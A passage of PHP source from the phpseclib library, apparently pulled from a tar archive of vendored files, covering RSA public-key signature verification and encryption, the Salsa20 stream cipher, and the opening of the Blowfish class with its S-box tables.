1) { return false; } $salt = substr($db, $temp + 1); // should be $sLen long $m2 = "\0\0\0\0\0\0\0\0" . $mHash . $salt; $h2 = $this->hash->hash($m2); return hash_equals($h, $h2); } /** * RSASSA-PSS-VERIFY * * See {@link http://tools.ietf.org/html/rfc3447#section-8.1.2 RFC3447#section-8.1.2}. * * @param string $m * @param string $s * @return bool|string */ private function rsassa_pss_verify($m, $s) { // Length checking if (strlen($s) != $this->k) { return false; } // RSA verification $modBits = strlen($this->modulus->toBits()); $s2 = $this->os2ip($s); $m2 = $this->rsavp1($s2); $em = $this->i2osp($m2, $this->k); if ($em === false) { return false; } // EMSA-PSS verification return $this->emsa_pss_verify($m, $em, $modBits - 1); } /** * Verifies a signature * * @see self::sign() * @param string $message * @param string $signature * @return bool */ public function verify($message, $signature) { switch ($this->signaturePadding) { case self::SIGNATURE_RELAXED_PKCS1: return $this->rsassa_pkcs1_v1_5_relaxed_verify($message, $signature); case self::SIGNATURE_PKCS1: return $this->rsassa_pkcs1_v1_5_verify($message, $signature); //case self::SIGNATURE_PSS: default: return $this->rsassa_pss_verify($message, $signature); } } /** * RSAES-PKCS1-V1_5-ENCRYPT * * See {@link http://tools.ietf.org/html/rfc3447#section-7.2.1 RFC3447#section-7.2.1}. * * @param string $m * @param bool $pkcs15_compat optional * @throws \LengthException if strlen($m) > $this->k - 11 * @return bool|string */ private function rsaes_pkcs1_v1_5_encrypt($m, $pkcs15_compat = false) { $mLen = strlen($m); // Length checking if ($mLen > $this->k - 11) { throw new \LengthException('Message too long'); } // EME-PKCS1-v1_5 encoding $psLen = $this->k - $mLen - 3; $ps = ''; while (strlen($ps) != $psLen) { $temp = Random::string($psLen - strlen($ps)); $temp = str_replace("\x00", '', $temp); $ps .= $temp; } $type = 2; $em = chr(0) . chr($type) . $ps . chr(0) . $m; // RSA encryption $m = $this->os2ip($em); $c = $this->rsaep($m); $c = $this->i2osp($c, $this->k); // Output the ciphertext C return $c; } /** * RSAES-OAEP-ENCRYPT * * See {@link http://tools.ietf.org/html/rfc3447#section-7.1.1 RFC3447#section-7.1.1} and * {http://en.wikipedia.org/wiki/Optimal_Asymmetric_Encryption_Padding OAES}. * * @param string $m * @throws \LengthException if strlen($m) > $this->k - 2 * $this->hLen - 2 * @return string */ private function rsaes_oaep_encrypt($m) { $mLen = strlen($m); // Length checking // if $l is larger than two million terrabytes and you're using sha1, PKCS#1 suggests a "Label too long" error // be output. if ($mLen > $this->k - 2 * $this->hLen - 2) { throw new \LengthException('Message too long'); } // EME-OAEP encoding $lHash = $this->hash->hash($this->label); $ps = str_repeat(chr(0), $this->k - $mLen - 2 * $this->hLen - 2); $db = $lHash . $ps . chr(1) . $m; $seed = Random::string($this->hLen); $dbMask = $this->mgf1($seed, $this->k - $this->hLen - 1); $maskedDB = $db ^ $dbMask; $seedMask = $this->mgf1($maskedDB, $this->hLen); $maskedSeed = $seed ^ $seedMask; $em = chr(0) . $maskedSeed . $maskedDB; // RSA encryption $m = $this->os2ip($em); $c = $this->rsaep($m); $c = $this->i2osp($c, $this->k); // Output the ciphertext C return $c; } /** * RSAEP * * See {@link http://tools.ietf.org/html/rfc3447#section-5.1.1 RFC3447#section-5.1.1}. * * @param \phpseclib3\Math\BigInteger $m * @return bool|\phpseclib3\Math\BigInteger */ private function rsaep($m) { if ($m->compare(self::$zero) < 0 || $m->compare($this->modulus) > 0) { throw new \OutOfRangeException('Message representative out of range'); } return $this->exponentiate($m); } /** * Raw Encryption / Decryption * * Doesn't use padding and is not recommended. * * @param string $m * @return bool|string * @throws \LengthException if strlen($m) > $this->k */ private function raw_encrypt($m) { if (strlen($m) > $this->k) { throw new \LengthException('Message too long'); } $temp = $this->os2ip($m); $temp = $this->rsaep($temp); return $this->i2osp($temp, $this->k); } /** * Encryption * * Both self::PADDING_OAEP and self::PADDING_PKCS1 both place limits on how long $plaintext can be. * If $plaintext exceeds those limits it will be broken up so that it does and the resultant ciphertext's will * be concatenated together. * * @see self::decrypt() * @param string $plaintext * @return bool|string * @throws \LengthException if the RSA modulus is too short */ public function encrypt($plaintext) { switch ($this->encryptionPadding) { case self::ENCRYPTION_NONE: return $this->raw_encrypt($plaintext); case self::ENCRYPTION_PKCS1: return $this->rsaes_pkcs1_v1_5_encrypt($plaintext); //case self::ENCRYPTION_OAEP: default: return $this->rsaes_oaep_encrypt($plaintext); } } /** * Returns the public key * * The public key is only returned under two circumstances - if the private key had the public key embedded within it * or if the public key was set via setPublicKey(). If the currently loaded key is supposed to be the public key this * function won't return it since this library, for the most part, doesn't distinguish between public and private keys. * * @param string $type * @param array $options optional * @return mixed */ public function toString($type, array $options = []) { $type = self::validatePlugin('Keys', $type, 'savePublicKey'); if ($type == PSS::class) { if ($this->signaturePadding == self::SIGNATURE_PSS) { $options += [ 'hash' => $this->hash->getHash(), 'MGFHash' => $this->mgfHash->getHash(), 'saltLength' => $this->getSaltLength() ]; } else { throw new UnsupportedFormatException('The PSS format can only be used when the signature method has been explicitly set to PSS'); } } return $type::savePublicKey($this->modulus, $this->publicExponent, $options); } /** * Converts a public key to a private key * * @return RSA */ public function asPrivateKey() { $new = new PrivateKey(); $new->exponent = $this->exponent; $new->modulus = $this->modulus; $new->k = $this->k; $new->format = $this->format; return $new ->withHash($this->hash->getHash()) ->withMGFHash($this->mgfHash->getHash()) ->withSaltLength($this->sLen) ->withLabel($this->label) ->withPadding($this->signaturePadding | $this->encryptionPadding); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/Salsa20.php000064400000034564147600400120021004 0ustar00 * @copyright 2019 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\Common\StreamCipher; use phpseclib3\Exception\BadDecryptionException; use phpseclib3\Exception\InsufficientSetupException; /** * Pure-PHP implementation of Salsa20. * * @author Jim Wigginton */ class Salsa20 extends StreamCipher { /** * Part 1 of the state * * @var string|false */ protected $p1 = false; /** * Part 2 of the state * * @var string|false */ protected $p2 = false; /** * Key Length (in bytes) * * @var int */ protected $key_length = 32; // = 256 bits /** * @see \phpseclib3\Crypt\Salsa20::crypt() */ const ENCRYPT = 0; /** * @see \phpseclib3\Crypt\Salsa20::crypt() */ const DECRYPT = 1; /** * Encryption buffer for continuous mode * * @var array */ protected $enbuffer; /** * Decryption buffer for continuous mode * * @var array */ protected $debuffer; /** * Counter * * @var int */ protected $counter = 0; /** * Using Generated Poly1305 Key * * @var boolean */ protected $usingGeneratedPoly1305Key = false; /** * Salsa20 uses a nonce * * @return bool */ public function usesNonce() { return true; } /** * Sets the key. * * @param string $key * @throws \LengthException if the key length isn't supported */ public function setKey($key) { switch (strlen($key)) { case 16: case 32: break; default: throw new \LengthException('Key of size ' . strlen($key) . ' not supported by this algorithm. Only keys of sizes 16 or 32 are supported'); } parent::setKey($key); } /** * Sets the nonce. * * @param string $nonce */ public function setNonce($nonce) { if (strlen($nonce) != 8) { throw new \LengthException('Nonce of size ' . strlen($key) . ' not supported by this algorithm. Only an 64-bit nonce is supported'); } $this->nonce = $nonce; $this->changed = true; $this->setEngine(); } /** * Sets the counter. * * @param int $counter */ public function setCounter($counter) { $this->counter = $counter; $this->setEngine(); } /** * Creates a Poly1305 key using the method discussed in RFC8439 * * See https://tools.ietf.org/html/rfc8439#section-2.6.1 */ protected function createPoly1305Key() { if ($this->nonce === false) { throw new InsufficientSetupException('No nonce has been defined'); } if ($this->key === false) { throw new InsufficientSetupException('No key has been defined'); } $c = clone $this; $c->setCounter(0); $c->usePoly1305 = false; $block = $c->encrypt(str_repeat("\0", 256)); $this->setPoly1305Key(substr($block, 0, 32)); if ($this->counter == 0) { $this->counter++; } } /** * Setup the self::ENGINE_INTERNAL $engine * * (re)init, if necessary, the internal cipher $engine * * _setup() will be called each time if $changed === true * typically this happens when using one or more of following public methods: * * - setKey() * * - setNonce() * * - First run of encrypt() / decrypt() with no init-settings * * @see self::setKey() * @see self::setNonce() * @see self::disableContinuousBuffer() */ protected function setup() { if (!$this->changed) { return; } $this->enbuffer = $this->debuffer = ['ciphertext' => '', 'counter' => $this->counter]; $this->changed = $this->nonIVChanged = false; if ($this->nonce === false) { throw new InsufficientSetupException('No nonce has been defined'); } if ($this->key === false) { throw new InsufficientSetupException('No key has been defined'); } if ($this->usePoly1305 && !isset($this->poly1305Key)) { $this->usingGeneratedPoly1305Key = true; $this->createPoly1305Key(); } $key = $this->key; if (strlen($key) == 16) { $constant = 'expand 16-byte k'; $key .= $key; } else { $constant = 'expand 32-byte k'; } $this->p1 = substr($constant, 0, 4) . substr($key, 0, 16) . substr($constant, 4, 4) . $this->nonce . "\0\0\0\0"; $this->p2 = substr($constant, 8, 4) . substr($key, 16, 16) . substr($constant, 12, 4); } /** * Setup the key (expansion) */ protected function setupKey() { // Salsa20 does not utilize this method } /** * Encrypts a message. * * @see \phpseclib3\Crypt\Common\SymmetricKey::decrypt() * @see self::crypt() * @param string $plaintext * @return string $ciphertext */ public function encrypt($plaintext) { $ciphertext = $this->crypt($plaintext, self::ENCRYPT); if (isset($this->poly1305Key)) { $this->newtag = $this->poly1305($ciphertext); } return $ciphertext; } /** * Decrypts a message. * * $this->decrypt($this->encrypt($plaintext)) == $this->encrypt($this->encrypt($plaintext)). * At least if the continuous buffer is disabled. * * @see \phpseclib3\Crypt\Common\SymmetricKey::encrypt() * @see self::crypt() * @param string $ciphertext * @return string $plaintext */ public function decrypt($ciphertext) { if (isset($this->poly1305Key)) { if ($this->oldtag === false) { throw new InsufficientSetupException('Authentication Tag has not been set'); } $newtag = $this->poly1305($ciphertext); if ($this->oldtag != substr($newtag, 0, strlen($this->oldtag))) { $this->oldtag = false; throw new BadDecryptionException('Derived authentication tag and supplied authentication tag do not match'); } $this->oldtag = false; } return $this->crypt($ciphertext, self::DECRYPT); } /** * Encrypts a block * * @param string $in */ protected function encryptBlock($in) { // Salsa20 does not utilize this method } /** * Decrypts a block * * @param string $in */ protected function decryptBlock($in) { // Salsa20 does not utilize this method } /** * Encrypts or decrypts a message. * * @see self::encrypt() * @see self::decrypt() * @param string $text * @param int $mode * @return string $text */ private function crypt($text, $mode) { $this->setup(); if (!$this->continuousBuffer) { if ($this->engine == self::ENGINE_OPENSSL) { $iv = pack('V', $this->counter) . $this->p2; return openssl_encrypt( $text, $this->cipher_name_openssl, $this->key, OPENSSL_RAW_DATA, $iv ); } $i = $this->counter; $blocks = str_split($text, 64); foreach ($blocks as &$block) { $block ^= static::salsa20($this->p1 . pack('V', $i++) . $this->p2); } return implode('', $blocks); } if ($mode == self::ENCRYPT) { $buffer = &$this->enbuffer; } else { $buffer = &$this->debuffer; } if (!strlen($buffer['ciphertext'])) { $ciphertext = ''; } else { $ciphertext = $text ^ Strings::shift($buffer['ciphertext'], strlen($text)); $text = substr($text, strlen($ciphertext)); if (!strlen($text)) { return $ciphertext; } } $overflow = strlen($text) % 64; // & 0x3F if ($overflow) { $text2 = Strings::pop($text, $overflow); if ($this->engine == self::ENGINE_OPENSSL) { $iv = pack('V', $buffer['counter']) . $this->p2; // at this point $text should be a multiple of 64 $buffer['counter'] += (strlen($text) >> 6) + 1; // ie. divide by 64 $encrypted = openssl_encrypt( $text . str_repeat("\0", 64), $this->cipher_name_openssl, $this->key, OPENSSL_RAW_DATA, $iv ); $temp = Strings::pop($encrypted, 64); } else { $blocks = str_split($text, 64); if (strlen($text)) { foreach ($blocks as &$block) { $block ^= static::salsa20($this->p1 . pack('V', $buffer['counter']++) . $this->p2); } } $encrypted = implode('', $blocks); $temp = static::salsa20($this->p1 . pack('V', $buffer['counter']++) . $this->p2); } $ciphertext .= $encrypted . ($text2 ^ $temp); $buffer['ciphertext'] = substr($temp, $overflow); } elseif (!strlen($buffer['ciphertext'])) { if ($this->engine == self::ENGINE_OPENSSL) { $iv = pack('V', $buffer['counter']) . $this->p2; $buffer['counter'] += (strlen($text) >> 6); $ciphertext .= openssl_encrypt( $text, $this->cipher_name_openssl, $this->key, OPENSSL_RAW_DATA, $iv ); } else { $blocks = str_split($text, 64); foreach ($blocks as &$block) { $block ^= static::salsa20($this->p1 . pack('V', $buffer['counter']++) . $this->p2); } $ciphertext .= implode('', $blocks); } } return $ciphertext; } /** * Left Rotate * * @param int $x * @param int $n * @return int */ protected static function leftRotate($x, $n) { if (PHP_INT_SIZE == 8) { $r1 = $x << $n; $r1 &= 0xFFFFFFFF; $r2 = ($x & 0xFFFFFFFF) >> (32 - $n); } else { $x = (int) $x; $r1 = $x << $n; $r2 = $x >> (32 - $n); $r2 &= (1 << $n) - 1; } return $r1 | $r2; } /** * The quarterround function * * @param int $a * @param int $b * @param int $c * @param int $d */ protected static function quarterRound(&$a, &$b, &$c, &$d) { $b ^= self::leftRotate($a + $d, 7); $c ^= self::leftRotate($b + $a, 9); $d ^= self::leftRotate($c + $b, 13); $a ^= self::leftRotate($d + $c, 18); } /** * The doubleround function * * @param int $x0 (by reference) * @param int $x1 (by reference) * @param int $x2 (by reference) * @param int $x3 (by reference) * @param int $x4 (by reference) * @param int $x5 (by reference) * @param int $x6 (by reference) * @param int $x7 (by reference) * @param int $x8 (by reference) * @param int $x9 (by reference) * @param int $x10 (by reference) * @param int $x11 (by reference) * @param int $x12 (by reference) * @param int $x13 (by reference) * @param int $x14 (by reference) * @param int $x15 (by reference) */ protected static function doubleRound(&$x0, &$x1, &$x2, &$x3, &$x4, &$x5, &$x6, &$x7, &$x8, &$x9, &$x10, &$x11, &$x12, &$x13, &$x14, &$x15) { // columnRound static::quarterRound($x0, $x4, $x8, $x12); static::quarterRound($x5, $x9, $x13, $x1); static::quarterRound($x10, $x14, $x2, $x6); static::quarterRound($x15, $x3, $x7, $x11); // rowRound static::quarterRound($x0, $x1, $x2, $x3); static::quarterRound($x5, $x6, $x7, $x4); static::quarterRound($x10, $x11, $x8, $x9); static::quarterRound($x15, $x12, $x13, $x14); } /** * The Salsa20 hash function function * * @param string $x */ protected static function salsa20($x) { $z = $x = unpack('V*', $x); for ($i = 0; $i < 10; $i++) { static::doubleRound($z[1], $z[2], $z[3], $z[4], $z[5], $z[6], $z[7], $z[8], $z[9], $z[10], $z[11], $z[12], $z[13], $z[14], $z[15], $z[16]); } for ($i = 1; $i <= 16; $i++) { $x[$i] += $z[$i]; } return pack('V*', ...$x); } /** * Calculates Poly1305 MAC * * @see self::decrypt() * @see self::encrypt() * @param string $ciphertext * @return string */ protected function poly1305($ciphertext) { if (!$this->usingGeneratedPoly1305Key) { return parent::poly1305($this->aad . $ciphertext); } else { /* sodium_crypto_aead_chacha20poly1305_encrypt does not calculate the poly1305 tag the same way sodium_crypto_aead_chacha20poly1305_ietf_encrypt does. you can see how the latter encrypts it in Salsa20::encrypt(). here's how the former encrypts it: $this->newtag = $this->poly1305( $this->aad . pack('V', strlen($this->aad)) . "\0\0\0\0" . $ciphertext . pack('V', strlen($ciphertext)) . "\0\0\0\0" ); phpseclib opts to use the IETF construction, even when the nonce is 64-bits instead of 96-bits */ return parent::poly1305( self::nullPad128($this->aad) . self::nullPad128($ciphertext) . pack('V', strlen($this->aad)) . "\0\0\0\0" . pack('V', strlen($ciphertext)) . "\0\0\0\0" ); } } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/Blowfish.php000064400000134506147600400120021351 0ustar00 unpack('N*', $x), $blocks); it jumps up by an additional * ~90MB, yielding a 106x increase in memory usage. Consequently, it bcrypt calls a different * _encryptBlock() then the regular Blowfish does. That said, the Blowfish _encryptBlock() is * basically just a thin wrapper around the bcrypt _encryptBlock(), so there's that. * * This explains 3 of the 4 _encryptBlock() implementations. the last _encryptBlock() * implementation can best be understood by doing Ctrl + F and searching for where * self::$use_reg_intval is defined. * * # phpseclib's three different _setupKey() implementations * * Every bcrypt round is the equivalent of encrypting 512KB of data. Since OpenSSH uses 16 * rounds by default that's ~8MB of data that's essentially being encrypted whenever * you use bcrypt. That's a lot of data, however, bcrypt operates within tighter constraints * than regular Blowfish, so we can use that to our advantage. In particular, whereas Blowfish * supports variable length keys, in bcrypt, the initial "key" is the sha512 hash of the * password. sha512 hashes are 512 bits or 64 bytes long and thus the bcrypt keys are of a * fixed length whereas Blowfish keys are not of a fixed length. * * bcrypt actually has two different key expansion steps. The first one (expandstate) is * constantly XOR'ing every _encryptBlock() parameter against the salt prior _encryptBlock()'s * being called. The second one (expand0state) is more similar to Blowfish's _setupKey() * but it can still use the fixed length key optimization discussed above and can do away with * the pack() / unpack() calls. * * I suppose _setupKey() could be made to be a thin wrapper around expandstate() but idk it's * just a lot of work for very marginal benefits as _setupKey() is only called once for * regular Blowfish vs the 128 times it's called --per round-- with bcrypt. * * # blowfish + bcrypt in the same class * * Altho there's a lot of Blowfish code that bcrypt doesn't re-use, bcrypt does re-use the * initial S-boxes, the initial P-array and the int-only _encryptBlock() implementation. * * # Credit * * phpseclib's bcrypt implementation is based losely off of OpenSSH's implementation: * * https://github.com/openssh/openssh-portable/blob/master/openbsd-compat/bcrypt_pbkdf.c * * Here's a short example of how to use this library: * * setKey('12345678901234567890123456789012'); * * $plaintext = str_repeat('a', 1024); * * echo $blowfish->decrypt($blowfish->encrypt($plaintext)); * ?> * * * @author Jim Wigginton * @author Hans-Juergen Petrich * @copyright 2007 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt; use phpseclib3\Crypt\Common\BlockCipher; /** * Pure-PHP implementation of Blowfish. * * @author Jim Wigginton * @author Hans-Juergen Petrich */ class Blowfish extends BlockCipher { /** * Block Length of the cipher * * @see \phpseclib3\Crypt\Common\SymmetricKey::block_size * @var int */ protected $block_size = 8; /** * The mcrypt specific name of the cipher * * @see \phpseclib3\Crypt\Common\SymmetricKey::cipher_name_mcrypt * @var string */ protected $cipher_name_mcrypt = 'blowfish'; /** * Optimizing value while CFB-encrypting * * @see \phpseclib3\Crypt\Common\SymmetricKey::cfb_init_len * @var int */ protected $cfb_init_len = 500; /** * The fixed subkeys boxes ($sbox0 - $sbox3) with 256 entries each * * S-Box 0 * * @var array */ private static $sbox0 = [ 0xd1310ba6, 0x98dfb5ac, 0x2ffd72db, 0xd01adfb7, 0xb8e1afed, 0x6a267e96, 0xba7c9045, 0xf12c7f99, 0x24a19947, 0xb3916cf7, 0x0801f2e2, 0x858efc16, 0x636920d8, 0x71574e69, 0xa458fea3, 0xf4933d7e, 0x0d95748f, 0x728eb658, 0x718bcd58, 0x82154aee, 0x7b54a41d, 0xc25a59b5, 0x9c30d539, 0x2af26013, 0xc5d1b023, 0x286085f0, 0xca417918, 0xb8db38ef, 0x8e79dcb0, 0x603a180e, 0x6c9e0e8b, 0xb01e8a3e, 0xd71577c1, 0xbd314b27, 0x78af2fda, 0x55605c60, 0xe65525f3, 0xaa55ab94, 0x57489862, 0x63e81440, 0x55ca396a, 0x2aab10b6, 0xb4cc5c34, 0x1141e8ce, 0xa15486af, 0x7c72e993, 0xb3ee1411, 0x636fbc2a, 0x2ba9c55d, 0x741831f6, 0xce5c3e16, 0x9b87931e, 0xafd6ba33, 0x6c24cf5c, 0x7a325381, 0x28958677, 0x3b8f4898, 0x6b4bb9af, 0xc4bfe81b, 0x66282193, 0x61d809cc, 0xfb21a991, 0x487cac60, 0x5dec8032, 0xef845d5d, 0xe98575b1, 0xdc262302, 0xeb651b88, 0x23893e81, 0xd396acc5, 0x0f6d6ff3, 0x83f44239, 0x2e0b4482, 0xa4842004, 0x69c8f04a, 0x9e1f9b5e, 0x21c66842, 0xf6e96c9a, 0x670c9c61, 0xabd388f0, 0x6a51a0d2, 0xd8542f68, 0x960fa728, 0xab5133a3, 0x6eef0b6c, 0x137a3be4, 0xba3bf050, 0x7efb2a98, 0xa1f1651d, 0x39af0176, 0x66ca593e, 0x82430e88, 0x8cee8619, 0x456f9fb4, 0x7d84a5c3, 0x3b8b5ebe, 0xe06f75d8, 0x85c12073, 0x401a449f, 0x56c16aa6, 0x4ed3aa62, 0x363f7706, 0x1bfedf72, 0x429b023d, 0x37d0d724, 0xd00a1248, 0xdb0fead3, 0x49f1c09b, 0x075372c9, 0x80991b7b, 0x25d479d8, 0xf6e8def7, 0xe3fe501a, 0xb6794c3b, 0x976ce0bd, 0x04c006ba, 0xc1a94fb6, 0x409f60c4, 0x5e5c9ec2, 0x196a2463, 0x68fb6faf, 0x3e6c53b5, 0x1339b2eb, 0x3b52ec6f, 0x6dfc511f, 0x9b30952c, 0xcc814544, 0xaf5ebd09, 0xbee3d004, 0xde334afd, 0x660f2807, 0x192e4bb3, 0xc0cba857, 0x45c8740f, 0xd20b5f39, 0xb9d3fbdb, 0x5579c0bd, 0x1a60320a, 0xd6a100c6, 0x402c7279, 0x679f25fe, 0xfb1fa3cc, 0x8ea5e9f8, 0xdb3222f8, 0x3c7516df, 0xfd616b15, 0x2f501ec8, 0xad0552ab, 0x323db5fa, 0xfd238760, 0x53317b48, 0x3e00df82, 0x9e5c57bb, 0xca6f8ca0, 0x1a87562e, 0xdf1769db, 0xd542a8f6, 0x287effc3, 0xac6732c6, 0x8c4f5573, 0x695b27b0, 0xbbca58c8, 0xe1ffa35d, 0xb8f011a0, 0x10fa3d98, 0xfd2183b8, 0x4afcb56c, 0x2dd1d35b, 0x9a53e479, 0xb6f84565, 0xd28e49bc, 0x4bfb9790, 0xe1ddf2da, 0xa4cb7e33, 0x62fb1341, 0xcee4c6e8, 0xef20cada, 0x36774c01, 0xd07e9efe, 0x2bf11fb4, 0x95dbda4d, 0xae909198, 0xeaad8e71, 0x6b93d5a0, 0xd08ed1d0, 0xafc725e0, 0x8e3c5b2f, 0x8e7594b7, 0x8ff6e2fb, 0xf2122b64, 0x8888b812, 0x900df01c, 0x4fad5ea0, 0x688fc31c, 0xd1cff191, 0xb3a8c1ad, 0x2f2f2218, 0xbe0e1777, 0xea752dfe, 0x8b021fa1, 0xe5a0cc0f, 0xb56f74e8, 0x18acf3d6, 0xce89e299, 0xb4a84fe0, 0xfd13e0b7, 0x7cc43b81, 0xd2ada8d9, 0x165fa266, 0x80957705, 0x93cc7314, 0x211a1477, 0xe6ad2065, 0x77b5fa86, 0xc75442f5, 0xfb9d35cf, 0xebcdaf0c, 0x7b3e89a0, 0xd6411bd3, 0xae1e7e49, 0x00250e2d, 0x2071b35e, 0x226800bb, 0x57b8e0af, 0x2464369b, 0xf009b91e, 0x5563911d, 0x59dfa6aa, 0x78c14389, 0xd95a537f, 0x207d5ba2, 0x02e5b9c5, 0x83260376, 0x6295cfa9, 0x11c81968, 0x4e734a41, 0xb3472dca, 0x7b14a94a, 0x1b510052, 0x9a532915, 0xd60f573f, 0xbc9bc6e4, 0x2b60a476, 0x81e67400, 0x08ba6fb5, 0x571be91f, 0xf296ec6b, 0x2a0dd915, 0xb6636521, 0xe7b9f9b6, 0xff34052e, 0xc5855664, 0x53b02d5d, 0xa99f8fa1, 0x08ba4799, 0x6e85076a ]; /** * S-Box 1 * * @var array */ private static $sbox1 = [ 0x4b7a70e9, 0xb5b32944, 0xdb75092e, 0xc4192623, 0xad6ea6b0, 0x49a7df7d, 0x9cee60b8, 0x8fedb266, 0xecaa8c71, 0x699a17ff, 0x5664526c, 0xc2b19ee1, 0x193602a5, 0x75094c29, 0xa0591340, 0xe4183a3e, 0x3f54989a, 0x5b429d65, 0x6b8fe4d6, 0x99f73fd6, 0xa1d29c07, 0xefe830f5, 0x4d2d38e6, 0xf0255dc1, 0x4cdd2086, 0x8470eb26, 0x6382e9c6, 0x021ecc5e, 0x09686b3f, 0x3ebaefc9, 0x3c971814, 0x6b6a70a1, 0x687f3584, 0x52a0e286, 0xb79c5305, 0xaa500737, 0x3e07841c, 0x7fdeae5c, 0x8e7d44ec, 0x5716f2b8, 0xb03ada37, 0xf0500c0d, 0xf01c1f04, 0x0200b3ff, 0xae0cf51a, 0x3cb574b2, 0x25837a58, 0xdc0921bd, 0xd19113f9, 0x7ca92ff6, 0x94324773, 0x22f54701, 0x3ae5e581, 0x37c2dadc, 0xc8b57634, 0x9af3dda7, 0xa9446146, 0x0fd0030e, 0xecc8c73e, 0xa4751e41, 0xe238cd99, 0x3bea0e2f, 0x3280bba1, 0x183eb331, 0x4e548b38, 0x4f6db908, 0x6f420d03, 0xf60a04bf, 0x2cb81290, 0x24977c79, 0x5679b072, 0xbcaf89af, 0xde9a771f, 0xd9930810, 0xb38bae12, 0xdccf3f2e, 0x5512721f, 0x2e6b7124, 0x501adde6, 0x9f84cd87, 0x7a584718, 0x7408da17, 0xbc9f9abc, 0xe94b7d8c, 0xec7aec3a, 0xdb851dfa, 0x63094366, 0xc464c3d2, 0xef1c1847, 0x3215d908, 0xdd433b37, 0x24c2ba16, 0x12a14d43, 0x2a65c451, 0x50940002, 0x133ae4dd, 0x71dff89e, 0x10314e55, 0x81ac77d6, 0x5f11199b, 0x043556f1, 0xd7a3c76b, 0x3c11183b, 0x5924a509, 0xf28fe6ed, 0x97f1fbfa, 0x9ebabf2c, 0x1e153c6e, 0x86e34570, 0xeae96fb1, 0x860e5e0a, 0x5a3e2ab3, 0x771fe71c, 0x4e3d06fa, 0x2965dcb9, 0x99e71d0f, 0x803e89d6, 0x5266c825, 0x2e4cc978, 0x9c10b36a, 0xc6150eba, 0x94e2ea78, 0xa5fc3c53, 0x1e0a2df4, 0xf2f74ea7, 0x361d2b3d, 0x1939260f, 0x19c27960, 0x5223a708, 0xf71312b6, 0xebadfe6e, 0xeac31f66, 0xe3bc4595, 0xa67bc883, 0xb17f37d1, 0x018cff28, 0xc332ddef, 0xbe6c5aa5, 0x65582185, 0x68ab9802, 0xeecea50f, 0xdb2f953b, 0x2aef7dad, 0x5b6e2f84, 0x1521b628, 0x29076170, 0xecdd4775, 0x619f1510, 0x13cca830, 0xeb61bd96, 0x0334fe1e, 0xaa0363cf, 0xb5735c90, 0x4c70a239, 0xd59e9e0b, 0xcbaade14, 0xeecc86bc, 0x60622ca7, 0x9cab5cab, 0xb2f3846e, 0x648b1eaf, 0x19bdf0ca, 0xa02369b9, 0x655abb50, 0x40685a32, 0x3c2ab4b3, 0x319ee9d5, 0xc021b8f7, 0x9b540b19, 0x875fa099, 0x95f7997e, 0x623d7da8, 0xf837889a, 0x97e32d77, 0x11ed935f, 0x16681281, 0x0e358829, 0xc7e61fd6, 0x96dedfa1, 0x7858ba99, 0x57f584a5, 0x1b227263, 0x9b83c3ff, 0x1ac24696, 0xcdb30aeb, 0x532e3054, 0x8fd948e4, 0x6dbc3128, 0x58ebf2ef, 0x34c6ffea, 0xfe28ed61, 0xee7c3c73, 0x5d4a14d9, 0xe864b7e3, 0x42105d14, 0x203e13e0, 0x45eee2b6, 0xa3aaabea, 0xdb6c4f15, 0xfacb4fd0, 0xc742f442, 0xef6abbb5, 0x654f3b1d, 0x41cd2105, 0xd81e799e, 0x86854dc7, 0xe44b476a, 0x3d816250, 0xcf62a1f2, 0x5b8d2646, 0xfc8883a0, 0xc1c7b6a3, 0x7f1524c3, 0x69cb7492, 0x47848a0b, 0x5692b285, 0x095bbf00, 0xad19489d, 0x1462b174, 0x23820e00, 0x58428d2a, 0x0c55f5ea, 0x1dadf43e, 0x233f7061, 0x3372f092, 0x8d937e41, 0xd65fecf1, 0x6c223bdb, 0x7cde3759, 0xcbee7460, 0x4085f2a7, 0xce77326e, 0xa6078084, 0x19f8509e, 0xe8efd855, 0x61d99735, 0xa969a7aa, 0xc50c06c2, 0x5a04abfc, 0x800bcadc, 0x9e447a2e, 0xc3453484, 0xfdd56705, 0x0e1e9ec9, 0xdb73dbd3, 0x105588cd, 0x675fda79, 0xe3674340, 0xc5c43465, 0x713e38d8, 0x3d28f89e, 0xf16dff20, 0x153e21e7, 0x8fb03d4a, 0xe6e39f2b, 0xdb83adf7 ]; /** * S-Box 2 * * @var array */ private static $sbox2 = [ 0xe93d5a68, 0x948140f7, 0xf64c261c, 0x94692934, 0x411520f7, 0x7602d4f7, 0xbcf46b2e, 0xd4a20068, 0xd4082471, 0x3320f46a, 0x43b7d4b7, 0x500061af, 0x1e39f62e, 0x97244546, 0x14214f74, 0xbf8b8840, 0x4d95fc1d, 0x96b591af, 0x70f4ddd3, 0x66a02f45, 0xbfbc09ec, 0x03bd9785, 0x7fac6dd0, 0x31cb8504, 0x96eb27b3, 0x55fd3941, 0xda2547e6, 0xabca0a9a, 0x28507825, 0x530429f4, 0x0a2c86da, 0xe9b66dfb, 0x68dc1462, 0xd7486900, 0x680ec0a4, 0x27a18dee, 0x4f3ffea2, 0xe887ad8c, 0xb58ce006, 0x7af4d6b6, 0xaace1e7c, 0xd3375fec, 0xce78a399, 0x406b2a42, 0x20fe9e35, 0xd9f385b9, 0xee39d7ab, 0x3b124e8b, 0x1dc9faf7, 0x4b6d1856, 0x26a36631, 0xeae397b2, 0x3a6efa74, 0xdd5b4332, 0x6841e7f7, 0xca7820fb, 0xfb0af54e, 0xd8feb397, 0x454056ac, 0xba489527, 0x55533a3a, 0x20838d87, 0xfe6ba9b7, 0xd096954b, 0x55a867bc, 0xa1159a58, 0xcca92963, 0x99e1db33, 0xa62a4a56, 0x3f3125f9, 0x5ef47e1c, 0x9029317c, 0xfdf8e802, 0x04272f70, 0x80bb155c, 0x05282ce3, 0x95c11548, 0xe4c66d22, 0x48c1133f, 0xc70f86dc, 0x07f9c9ee, 0x41041f0f, 0x404779a4, 0x5d886e17, 0x325f51eb, 0xd59bc0d1, 0xf2bcc18f, 0x41113564, 0x257b7834, 0x602a9c60, 0xdff8e8a3, 0x1f636c1b, 0x0e12b4c2, 0x02e1329e, 0xaf664fd1, 0xcad18115, 0x6b2395e0, 0x333e92e1, 0x3b240b62, 0xeebeb922, 0x85b2a20e, 